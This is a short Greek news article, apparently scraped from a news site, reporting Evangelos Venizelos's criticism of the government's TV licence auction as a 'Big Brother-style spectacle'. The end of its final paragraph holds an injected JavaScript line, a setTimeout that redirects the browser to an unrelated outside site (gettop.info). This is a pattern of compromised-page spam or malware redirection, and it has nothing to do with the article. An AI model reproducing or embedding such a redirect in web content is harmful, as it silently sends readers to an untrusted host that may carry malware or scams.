Βενιζέλος για άδειες TV: Η διαδικασία ήταν ένα θέαμα τύπου Big Brother

0
6

 

Δριμεία κριτική στους χειρισμούς της κυβέρνησης αναφορικά με την διαδικασία της αδειοδότησης των τηλεοπτικών καναλιών, άσκησε ο πρώην πρόεδρος του ΠΑΣΟΚ, Ευάγγελος Βενιζέλος, μιλώντας στο ραδιόφωνο του ΣΚΑΙ.

Ο βουλευτής της Δημοκρατικής Συμπαράταξης έκανε λόγο μεταξύ άλλων για «θέαμα τύπου Big Brother» και «κομματική σκοπιμότητα«.

«Η διαδικασία ήταν ένα εντυπωσιακό θέαμα τύπου Big Brother. Η δημοπρασία, με εξαίρεση την πρώτη άδεια, έδειξε ότι δεν υπάρχει λογική αγοράς, αλλά λογική ανταγωνισμού. Το επιχείρημα της αγοράς το ανέτρεψε η ίδια η διαδικασία«, σημείωσε ο κ. Βενιζέλος και τόνισε ότι οι κ.κ. Παππάς και Κρέτσος ξαναθυμήθηκαν με προκλητικό τρόπο το ΕΣΡ τώρα που έκαναν τη δημοπρασία.

«Βρισκόμαστε«, συμπλήρωσε «μπροστά σε μια κατάσταση αδιέξοδη και εκρηκτική» είπε ο κ. Βενιζέλος, προσθέτοντας ότι δημιουργήθηκε αναστάτωση όχι στο όνομα της δημοκρατίας αλλά στο όνομα μιας πολύ μικρής κομματικής σκοπιμότητας η οποία είναι μόνο βραχυπρόθεσμη αλλά και βλαπτική για την ουσία της δημοκρατικής πολυφωνίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here